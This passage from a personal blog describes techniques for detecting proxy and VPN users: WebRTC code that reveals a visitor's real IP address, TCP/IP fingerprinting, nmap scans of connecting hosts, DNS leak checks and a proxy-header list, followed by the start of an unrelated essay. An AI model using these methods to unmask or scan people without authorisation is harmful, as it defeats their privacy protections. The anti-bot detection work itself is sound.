<p>However, WebRTC in Chrome is unaffected by any proxy configuration. If a browser is configured to use a proxy server (<code>google-chrome --proxy-server="socks5://localhost:1080"</code>), WebRTC does not communicate through this proxy, because WebRTC uses UDP by default and most HTTP(S) or SOCKS proxies only support TCP. This default behavior of Chrome <a href="https://webrtchacks.com/so-your-vpn-is-leaking-because-of-webrtc/">can be fixed</a>.</p>
<p>Without further ado, the HTML source below will display your IP address as seen by WebRTC:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><!DOCTYPE html></span><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">charset</span><span class="o">=</span><span class="s">"utf-8"</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">name</span><span class="o">=</span><span class="s">"viewport"</span> <span class="na">content</span><span class="o">=</span><span class="s">"width=device-width, initial-scale=1"</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">></span>WebRTC leak<span class="p"></</span><span class="nt">title</span><span class="p">></span>
<span class="p"></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">var</span> <span class="nx">ips</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">function</span> <span class="nx">findIP</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">myPeerConnection</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">RTCPeerConnection</span> <span class="o">||</span> <span class="nb">window</span><span class="p">.</span><span class="nx">mozRTCPeerConnection</span> <span class="o">||</span> <span class="nb">window</span><span class="p">.</span><span class="nx">webkitRTCPeerConnection</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">pc</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">myPeerConnection</span><span class="p">({</span><span class="nx">iceServers</span><span class="o">:</span> <span class="p">[{</span><span class="nx">urls</span><span class="o">:</span> <span class="s2">"stun:stun.l.google.com:19302"</span><span class="p">}]}),</span>
<span class="nx">noop</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{},</span>
<span class="nx">localIPs</span> <span class="o">=</span> <span class="p">{},</span>
<span class="nx">ipRegex</span> <span class="o">=</span> <span class="sr">/([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g</span><span class="p">,</span>
<span class="nx">key</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">ipIterate</span><span class="p">(</span><span class="nx">ip</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">localIPs</span><span class="p">[</span><span class="nx">ip</span><span class="p">])</span> <span class="p">{</span>
<span class="nx">ips</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">ip</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"webRTCResult"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">ips</span><span class="p">,</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">localIPs</span><span class="p">[</span><span class="nx">ip</span><span class="p">]</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">createDataChannel</span><span class="p">(</span><span class="s2">""</span><span class="p">);</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">createOffer</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">sdp</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">sdp</span><span class="p">.</span><span class="nx">sdp</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="s1">'\n'</span><span class="p">).</span><span class="nx">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">line</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">line</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="s1">'candidate'</span><span class="p">)</span> <span class="o"><</span> <span class="mf">0</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
<span class="p">(</span><span class="nx">line</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">)</span> <span class="o">||</span> <span class="p">[]).</span><span class="nx">forEach</span><span class="p">(</span><span class="nx">ipIterate</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">setLocalDescription</span><span class="p">(</span><span class="nx">sdp</span><span class="p">,</span> <span class="nx">noop</span><span class="p">,</span> <span class="nx">noop</span><span class="p">);</span>
<span class="p">},</span> <span class="nx">noop</span><span class="p">);</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">onicecandidate</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">ice</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">ice</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">))</span> <span class="k">return</span><span class="p">;</span>
<span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">).</span><span class="nx">forEach</span><span class="p">(</span><span class="nx">ipIterate</span><span class="p">);</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s1">'DOMContentLoaded'</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="c1">// Wait until the result element exists, so the catch branch can write to it</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">findIP</span><span class="p">();</span>
<span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">ips</span> <span class="o">=</span> <span class="s1">'WebRTC failed: '</span> <span class="o">+</span> <span class="nx">err</span><span class="p">.</span><span class="nx">toString</span><span class="p">();</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"webRTCResult"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">ips</span><span class="p">,</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">});</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">h4</span><span class="p">></span>WebRTC Detected IPs<span class="p"></</span><span class="nt">h4</span><span class="p">></span>
<span class="p"><</span><span class="nt">pre</span> <span class="na">id</span><span class="o">=</span><span class="s">"webRTCResult"</span><span class="p">></</span><span class="nt">pre</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>If the IP address obtained with WebRTC differs from the IP address that the browser otherwise uses, it is a strong signal that a proxy server is used. Therefore, this test is very helpful for detecting (misconfigured) proxy-browser sessions.</p>
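<p>On the server side, the check then boils down to comparing the addresses reported by the browser with the source address of the HTTP connection. The following is a minimal sketch under a few assumptions: the function names are hypothetical, only IPv4 is handled for brevity, and the addresses in the usage example are documentation placeholders.</p>

```javascript
// Private, loopback, link-local and CGNAT IPv4 ranges never show up as a public source IP,
// so they are ignored when comparing against the address the server sees.
function isPrivateIPv4(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some((p) => !Number.isInteger(p) || p < 0 || p > 255)) return false;
  const [a, b] = parts;
  return a === 10 || a === 127 ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168) ||
    (a === 169 && b === 254) ||
    (a === 100 && b >= 64 && b <= 127);
}

// webrtcIps: addresses collected in the browser (e.g. the `ips` array from the page above).
// httpSourceIp: source address of the HTTP connection as seen by the web server.
function webrtcMismatch(webrtcIps, httpSourceIp) {
  // IPv6 candidates are skipped in this sketch.
  const publicIps = webrtcIps.filter((ip) => ip.includes('.') && !isPrivateIPv4(ip));
  const leaked = publicIps.filter((ip) => ip !== httpSourceIp);
  return { leaked, mismatch: leaked.length > 0 };
}

// Placeholder addresses from the documentation ranges.
const viaProxy = webrtcMismatch(['192.168.1.20', '203.0.113.7'], '198.51.100.23');
const noProxy = webrtcMismatch(['192.168.1.20', '203.0.113.7'], '203.0.113.7');
console.log(viaProxy, noProxy);
```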
<h2>3. TCP/IP Fingerprint Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Compare the OS inferred from the TCP/IP fingerprint with the OS advertised by the User-Agent</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Somewhat. The client will need to alter their TCP/IP stack configuration to change their TCP/IP fingerprint. In case of a proxy server, the proxy server needs to dynamically match the TCP/IP stack configuration of the User-Agent it routes the traffic for.</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>Right after the User-Agent header of the first incoming HTTP request has reached the server.</td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>High, but not 100%</td>
</tr>
</tbody>
</table>
<p>I created a Python module named <a href="https://github.com/NikolaiT/zardaxt">zardaxt.py</a> that uses <code>tcpdump</code> in order to detect the operating system from an incoming SYN packet belonging to a three-way TCP/IP handshake.</p>
<p>Please consult the <a href="https://github.com/NikolaiT/zardaxt">GitHub page</a> if you want to know exactly how this technique works, but in short: The TCP and IP header fields have different default values on the major operating systems (Linux, Windows, iOS), thus it's possible to infer the operating system by looking at those header fields alone.</p>
<p>This test compares the operating system inferred from the TCP/IP fingerprint with the operating system displayed in the User-Agent or <code>navigator.userAgent</code> property from the browser. If there is a mismatch, a proxy might be in use!</p>
<p>I have to admit that this test is not 100% accurate. I look at it more as <em>one bit</em> of additional information to make an educated guess.</p>
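<p>The comparison step can be sketched like this. It assumes the fingerprinting side already produced a single OS label; the label format, the function names and the family mapping are assumptions for illustration and not the output format of zardaxt.py.</p>

```javascript
// Very rough User-Agent parsing. Order matters: Android UAs contain "Linux"
// and iOS UAs contain "Mac OS X".
function osFromUserAgent(userAgent) {
  if (/Android/i.test(userAgent)) return 'Android';
  if (/iPhone|iPad|iPod/i.test(userAgent)) return 'iOS';
  if (/Windows/i.test(userAgent)) return 'Windows';
  if (/Mac OS X|Macintosh/i.test(userAgent)) return 'macOS';
  if (/Linux/i.test(userAgent)) return 'Linux';
  return 'unknown';
}

// Assumption of this sketch: operating systems that share a kernel family are
// treated as indistinguishable at the TCP/IP level.
const OS_FAMILY = { Android: 'linux', Linux: 'linux', iOS: 'apple', macOS: 'apple', Windows: 'windows' };

function osMismatch(fingerprintOs, userAgent) {
  const uaOs = osFromUserAgent(userAgent);
  const fingerprintFamily = OS_FAMILY[fingerprintOs];
  const uaFamily = OS_FAMILY[uaOs];
  // Only report a mismatch when both sides could be classified.
  const comparable = fingerprintFamily !== undefined && uaFamily !== undefined;
  return { uaOs, fingerprintOs, mismatch: comparable && fingerprintFamily !== uaFamily };
}

const windowsUa = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36';
const androidUa = 'Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36';
console.log(osMismatch('Linux', windowsUa)); // Windows browser, Linux TCP/IP stack
console.log(osMismatch('Linux', androidUa)); // Android runs a Linux kernel
```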
<h2>4. Open Ports Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Check if the host connecting to the web server has open ports or is reachable from the Internet</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Somewhat. Either the client is pingable from the Internet or not. A properly configured iptables ruleset can drop any incoming packet that does not belong to an outbound connection.</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>After the <code>nmap</code> port scan or <code>ping</code> probe has completed. Maybe 500ms after the first SYN packet.</td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>High</td>
</tr>
</tbody>
</table>
<p>This test is maybe a bit invasive, but it's relatively easy to explain how it works: If I have sufficient grounds to assume that an incoming connection belongs to a proxy, I run a port scan with <code>nmap</code>. Alternatively, I can <code>ping</code> the host. If the host is up and reachable from the Internet, that is usually already a sign that it could be a proxy. Most normal Internet users are behind an ISP or carrier-grade NAT, which does not allow incoming connections from the Internet.</p>
<p>If the host has well-known proxy ports open such as <code>3128</code> or <code>1080</code>, it is a strong sign that the host has a proxy server running.</p>
<p>Of course, smart proxy providers will disallow any incoming connections from arbitrary IP ranges, but maybe some magic can be done with <a href="https://nmap.org/book/firewalls.html">nmap firewall and intrusion detection system bypassing</a>.</p>
<p>I consider this test to be only necessary when there is some evidence that the host might be a proxy but I am not entirely sure.</p>
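<p>How the scan result could be turned into a verdict is sketched below. The scan itself is not shown; the sketch assumes the open ports and the reachability flag were already extracted from the <code>nmap</code> or <code>ping</code> output. The function name and the verdict labels are hypothetical.</p>

```javascript
// Well-known proxy ports mentioned in this section.
const PROXY_PORTS = new Set([3128, 1080]);

// reachable: did the host answer a ping or any probe at all?
// openPorts: list of open TCP ports found by the port scan.
function assessHost({ reachable, openPorts }) {
  const proxyPorts = openPorts.filter((port) => PROXY_PORTS.has(port));
  if (proxyPorts.length > 0) return { verdict: 'likely-proxy', proxyPorts };
  // Most normal users sit behind NAT and are not reachable from the Internet.
  if (reachable || openPorts.length > 0) return { verdict: 'suspicious', proxyPorts };
  return { verdict: 'no-signal', proxyPorts };
}

console.log(assessHost({ reachable: true, openPorts: [22, 3128] }));
console.log(assessHost({ reachable: true, openPorts: [] }));
console.log(assessHost({ reachable: false, openPorts: [] }));
```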
<h2>5. Datacenter IP Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Check if the IP address belongs to a datacenter. Datacenter proxies are often hosted in public datacenters such as AWS or Digitalocean. Those cloud providers publish their IP ranges, which makes it possible to check if a proxy belongs to a datacenter or not.</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>No (if the public IP ranges of the datacenters are to be trusted)</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>Immediately after first incoming SYN packet.</td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>100%</td>
</tr>
</tbody>
</table>
<p>Recently, I <a href="https://incolumitas.com/pages/Datacenter-IP-API/">published an API</a> that checks whether an IP address belongs to a datacenter IP address range of Azure, AWS, DigitalOcean, Google Cloud Platform or one of many other cloud providers.</p>
<p>Those cloud services periodically publish their public IP ranges and if I encounter a connection from such a datacenter IP address, I almost immediately know that this IP address does not belong to a normal Internet user. If the IP address behaves badly, I throttle it fast.</p>
<p>By using services such as <a href="https://ipinfo.io/">ipinfo.io</a>, I can assign a quality ranking to each IP address. An IP address from an ISP such as Deutsche Telekom or Comcast surely is more trustworthy than an IP address belonging to the cloud provider DigitalOcean.</p>
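<p>The core of such a lookup is a CIDR membership test. Below is a minimal IPv4-only sketch; it is not the implementation behind my API. The provider names and ranges are placeholders taken from the documentation address space, real ranges would have to be loaded from the lists the cloud providers publish.</p>

```javascript
// Convert a dotted IPv4 address into an unsigned 32-bit integer.
function ipv4ToInt(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some((p) => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error('not an IPv4 address: ' + ip);
  }
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

// True if ip lies inside the CIDR block, e.g. inCidr('203.0.113.9', '203.0.113.0/24').
function inCidr(ip, cidr) {
  const [base, bitsText] = cidr.split('/');
  const bits = Number(bitsText);
  // A shift by 32 is a no-op in JavaScript, so /0 needs special handling.
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((ipv4ToInt(ip) & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
}

// Placeholder ranges (documentation address space), NOT real provider ranges.
const DATACENTER_RANGES = [
  { provider: 'ExampleCloud', cidr: '203.0.113.0/24' },
  { provider: 'ExampleHosting', cidr: '198.51.100.128/25' },
];

function findDatacenter(ip, ranges = DATACENTER_RANGES) {
  const hit = ranges.find((range) => inCidr(ip, range.cidr));
  return hit ? hit.provider : null;
}

console.log(findDatacenter('203.0.113.9'), findDatacenter('198.51.100.5'));
```

<p>A linear scan is fine for a handful of ranges. With many thousands of ranges, sorting them by start address and using binary search would be the more sensible choice.</p>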
<h2>6. DNS Leak Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Check if the DNS server of the client leaks any data. If the DNS queries reveal the IP address of the client's ISP DNS resolver, that address does not match the proxy IP address.</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Yes, just use a generic DNS resolver such as the one from Google (8.8.8.8) or Cloudflare</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>As soon as the SYN packet has arrived on the server and the DNS query has reached the DNS server.</td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>100%</td>
</tr>
</tbody>
</table>
<p><a href="https://en.wikipedia.org/wiki/DNS_leak">Wikipedia defines</a> a DNS leak as follows:</p>
<blockquote>
<p>A DNS leak refers to a security flaw that allows DNS requests to be revealed to ISP DNS servers, despite the use of a VPN service to attempt to conceal them. Although primarily of concern to VPN users, it is also possible to prevent it for proxy and direct internet users.</p>
</blockquote>
<p>But my test and use case is a bit different: I am not interested in what websites the users are visiting (after all they visit my proxy detection test site), I only want to see if the IP addresses of the DNS servers actually belong to an entity that could reasonably be related to the IP address of the client!</p>
<p>Put differently: If the proxy IP address belongs to an ISP from Vietnam, but the IP addresses of the DNS servers belong to Comcast in North America, it might be an indication that a bot programmer forgot to send their DNS queries through public and generic DNS resolvers such as the public DNS server from Google (8.8.8.8).</p>
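<p>Expressed as code, the plausibility check could look like the sketch below. It assumes that metadata (country, AS number, organization) for the client IP and for the resolver IP was already looked up in some IP database; the record shape, the function name and the AS numbers (taken from the private-use range) are assumptions for illustration.</p>

```javascript
// Operators of generic public resolvers. Their resolvers reveal nothing about the client.
const PUBLIC_RESOLVER_ORGS = new Set(['Google', 'Cloudflare']);

// client / resolver: { country, asn, org } records from an IP metadata lookup (hypothetical shape).
function dnsMismatch(client, resolver) {
  if (PUBLIC_RESOLVER_ORGS.has(resolver.org)) return { mismatch: false, reason: 'public resolver' };
  if (client.asn === resolver.asn) return { mismatch: false, reason: 'same network' };
  if (client.country !== resolver.country) return { mismatch: true, reason: 'resolver in different country' };
  return { mismatch: false, reason: 'same country' };
}

// Placeholder records: a client IP in Vietnam whose DNS queries arrive from a US ISP resolver.
const clientIp = { country: 'VN', asn: 64512, org: 'Example ISP Vietnam' };
const ispResolver = { country: 'US', asn: 64513, org: 'Example ISP USA' };
const googleResolver = { country: 'US', asn: 64514, org: 'Google' };
console.log(dnsMismatch(clientIp, ispResolver), dnsMismatch(clientIp, googleResolver));
```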
<h2>7. HTTP Proxy Headers Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Look for suspicious proxy headers in the HTTP headers</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Yes, just drop any proxy headers on your proxy server</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>Right after the headers of the first incoming HTTP request have reached the server.</td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>100%</td>
</tr>
</tbody>
</table>
<p>Many HTTP proxy servers add additional HTTP headers to each HTTP request. The presence of those headers indicates that a proxy server is used. I consider the following HTTP headers to be evidence that the connection is proxied over an HTTP proxy:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">proxy_headers</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'Forwarded'</span><span class="p">,</span> <span class="s1">'Proxy-Authorization'</span><span class="p">,</span>
<span class="s1">'X-Forwarded-For'</span><span class="p">,</span> <span class="s1">'Proxy-Authenticate'</span><span class="p">,</span>
<span class="s1">'X-Requested-With'</span><span class="p">,</span> <span class="s1">'From'</span><span class="p">,</span>
<span class="s1">'X-Real-Ip'</span><span class="p">,</span> <span class="s1">'Via'</span><span class="p">,</span> <span class="s1">'True-Client-Ip'</span><span class="p">,</span> <span class="s1">'Proxy_Connection'</span><span class="p">];</span>
</code></pre></div>
<p>Of course, those headers can be dropped by <em>anonymous</em> proxy servers, but many providers forget even that.</p>
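<p>Checking a request against this list is straightforward. The sketch below assumes a plain object of request headers, such as <code>req.headers</code> in a Node.js HTTP server, where header names arrive lower-cased; the function name <code>findProxyHeaders</code> is hypothetical. The comparison is case-insensitive because HTTP header names are.</p>

```javascript
// The header list from above, copied verbatim.
const PROXY_HEADERS = ['Forwarded', 'Proxy-Authorization',
  'X-Forwarded-For', 'Proxy-Authenticate',
  'X-Requested-With', 'From',
  'X-Real-Ip', 'Via', 'True-Client-Ip', 'Proxy_Connection'];

const PROXY_HEADER_SET = new Set(PROXY_HEADERS.map((name) => name.toLowerCase()));

// headers: object mapping header names to values.
// Returns the names of all headers that hint at a proxy.
function findProxyHeaders(headers) {
  return Object.keys(headers).filter((name) => PROXY_HEADER_SET.has(name.toLowerCase()));
}

const suspicious = findProxyHeaders({
  'user-agent': 'Mozilla/5.0',
  'via': '1.1 proxy.example',
  'x-forwarded-for': '203.0.113.7',
});
console.log(suspicious);
```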
<h2>Even More Juice</h2>
<p>And there are even more viable test strategies to detect proxies:</p>
<ol>
<li>IP Timezone vs Browser Timezone Test: You can compare the timezone obtained with an IP geolocation API with the browser timezone. If there is a mismatch, it might be because a proxy is used.</li>
<li>Browser Based Port Scanning of the internal network: With <a href="https://incolumitas.com/2021/01/10/browser-based-port-scanning/">browser based port scanning techniques</a>, it is possible to find out if there is a proxy server listening for connections. Tor, for example, uses port 9050 or 9150 by default, so browser based port scanning might detect Tor usage. Other known ports used for proxies/VPNs are 3128, 8081 and 1080.</li>
<li>Detect an Internet-reachable host with <code>ping</code>. Hosts that are not behind a NAT and are reachable from the Internet are suspicious. Downside: The network and hosts on the routing path must support ICMP, but ICMP packets are often filtered by firewalls.</li>
<li>Another idea is to consult public IP spam/ban lists such as the <a href="http://iplists.firehol.org/">fireHOL ipset list</a>. The <a href="https://github.com/firehol/blocklist-ipsets">blocklist-ipsets GitHub repository</a> accumulates IP ban lists from many sources on the Internet! I recently published <a href="https://incolumitas.com/pages/FireHOL-API/">an API</a> to query the blocklist-ipsets fireHOL lists.</li>
</ol>
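<p>The first idea from the list, the timezone comparison, can be sketched as follows. In the browser, the timezone name is available via <code>Intl.DateTimeFormat().resolvedOptions().timeZone</code>; the timezone of the IP address is assumed to come from some IP geolocation API. The sketch compares UTC offsets instead of names, because two different timezone names can describe the same local time. All function names are hypothetical.</p>

```javascript
// Interpret the wall-clock time of `date` in `timeZone` as if it were UTC.
function wallClockAsUtc(timeZone, date) {
  const parts = new Intl.DateTimeFormat('en-US', {
    timeZone, hourCycle: 'h23',
    year: 'numeric', month: 'numeric', day: 'numeric',
    hour: 'numeric', minute: 'numeric', second: 'numeric',
  }).formatToParts(date);
  const get = (type) => Number(parts.find((p) => p.type === type).value);
  return Date.UTC(get('year'), get('month') - 1, get('day'), get('hour'), get('minute'), get('second'));
}

// Offset of the timezone from UTC in minutes at the given instant (DST aware).
function utcOffsetMinutes(timeZone, date = new Date()) {
  return Math.round((wallClockAsUtc(timeZone, date) - date.getTime()) / 60000);
}

// ipTimeZone: from an IP geolocation lookup. browserTimeZone: reported by the browser.
function timezoneMismatch(ipTimeZone, browserTimeZone, date = new Date()) {
  return utcOffsetMinutes(ipTimeZone, date) !== utcOffsetMinutes(browserTimeZone, date);
}

const when = new Date('2021-07-01T12:00:00Z');
console.log(timezoneMismatch('Asia/Ho_Chi_Minh', 'Europe/Berlin', when));
console.log(timezoneMismatch('Europe/Vienna', 'Europe/Berlin', when));
```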
<h2>Discussion about Proxy/VPN Detection on the Internet</h2>
<p>Discussion on Stack Overflow regarding the question <a href="https://stackoverflow.com/questions/33300877/how-do-you-detect-a-vpn-or-proxy-connection">How do you detect a VPN or Proxy connection?</a></p>
<blockquote>
<p>Frankly, IP-based bans (or actually, any kind of limiting focusing on people who do not exclusively possess their public IP address: proxy servers, VPNs, NAT devices, etc) have been unrealistic for a long time, and as the IPv4 pools have been getting depleted in many parts of the world, ISPs are putting more and more clients behind large NAT pools</p>
</blockquote>
<p>Frankly, I doubt the above statement. Most websites and anti-bot companies put a lot of emphasis on IP addresses when it comes to bans.</p>
<p>A better discussion on Security Stack Exchange: <a href="https://security.stackexchange.com/questions/71774/how-can-i-detect-a-vpn-connection-even-just-in-some-cases-to-get-the-real-loca">How can I detect a VPN connection (even just in some cases) to get the real location of the user</a></p>
<blockquote>
<p>Finding out that a user is using a VPN service provider isn't that difficult. Most of them have static IP addresses for their exit gateways, so it could just be using a list of known IP addresses to identify VPNs.</p>
</blockquote>
<p>Which is a reasonable strategy. It might be hard to keep those lists up to date and to enumerate all VPN exit nodes, though.</p>
<blockquote>
<p>And even when they don't have a list, a simple reverse DNS lookup might tell them that the IP has a hostname which is obviously a VPN provider and not one assigned by a normal internet service provider.</p>
</blockquote>
<p>I doubt that VPN providers focused on privacy have a DNS entry for their exit node IP addresses that identifies their company.</p>
<h4>Detect VPN Usage by decreased MTU/MSS</h4>
<p>A very interesting read: <a href="https://medium.com/@ValdikSS/detecting-vpn-and-its-configuration-and-proxy-users-on-the-server-side-1bcc59742413">Detecting VPN (and its configuration!) and proxy users on the server side</a></p>
<p>Main points from the blog article, <strong>direct citation</strong>:</p>
<blockquote>
<p>As you try to open a web page with PPTP, L2TP(±IPsec) or IPsec IKE connected, your packet is encapsulated into another packet which introduces overhead. Large packets which could be sent without fragmentation without VPN connected now should be fragmented in order to be successfully delivered via your network, which lowers your speed and adds latency. In order to mitigate excessive fragmentation, OS sets lower MTU on the VPN interface then your real network interface MTU, preventing huge packets which would require fragmentation to be created.</p>
<p>To support old or just crappy software, OpenVPN doesn’t decrease interface MTU but decreases MSS inside encapsulated packet. That’s done with the mssfix setting which calculates OpenVPN overhead for the packet encapsulation and encryption and sets MSS accordingly for the packets to flow without any fragmentation. It is configured to work with any link with MTU 1450 or more by default.</p>
<p>Because of this unique MSS values, we can determine not only if the user is connected via OpenVPN , but also used connection protocol (IPv4, IPv6), transport protocol (UDP, TCP), cipher, MAC and compression as they affect MSS.</p>
</blockquote>
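<p>To make the MSS idea concrete: on a plain Ethernet link with an MTU of 1500 bytes, the MSS announced in the SYN packet is 1460 for IPv4 (1500 minus 20 bytes IP header and 20 bytes TCP header) and 1440 for IPv6 (40 bytes IP header). The sketch below flags connections whose MSS is clearly lower. The function names and the tolerance are assumptions of mine, not part of the cited article; the tolerance of 8 bytes lets PPPoE links (MTU 1492) pass. A reduced MSS is only a hint, since mobile networks and other tunnels lower it as well.</p>

```javascript
// IP header + TCP header in bytes, without options.
const HEADER_BYTES = { 4: 20 + 20, 6: 40 + 20 };

function expectedMss(ipVersion, mtu = 1500) {
  return mtu - HEADER_BYTES[ipVersion];
}

// observedMss: MSS option from the client's SYN packet.
// toleranceBytes: hypothetical slack for links such as PPPoE.
function mssSignal(observedMss, ipVersion, toleranceBytes = 8) {
  const deficit = expectedMss(ipVersion) - observedMss;
  return { deficit, reducedMss: deficit > toleranceBytes };
}

console.log(mssSignal(1460, 4)); // plain Ethernet
console.log(mssSignal(1452, 4)); // PPPoE
console.log(mssSignal(1360, 4)); // clearly reduced, possibly a tunnel
```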
<p>I think I will cover VPN detection by deep packet inspection and decreased MTU/MSS detection in the next blog post. I am already very excited about this topic!</p>Where is the World headed to?2021-10-03T14:51:00+02:002021-10-06T23:51:00+02:00Nikolai Tschachertag:incolumitas.com,2021-10-03:/2021/10/03/where-is-the-world-headed-to/<p>My personal opinion on economic and sociological topics in the near (2030) and mid-term (2050) future. This essay is divided into the following categories: Climate Crisis, Globalisation & Economy, Geopolitics & War, Advance of Medicine & Technology.</p><p>Important: I am a computer scientist, not an economist or sociologist. So please take everything written here with a grain of salt - as always. Some of the information is based on educated guesses, other statements are wild assumptions. Furthermore, I am sharing my thoughts about society and economy for mainly two reasons:</p>
<ol>
<li>I need to write out my current world view. It might be interesting for me in the future to look back on how I thought when I was 30 years old. So consider this to be part of my political & economic diary.</li>
<li>Some of my readers or the people I worked with might actually be interested to know how I look at the world. But that's probably the first wild assumption being made here ;)</li>
</ol>
<h2>Introduction</h2>
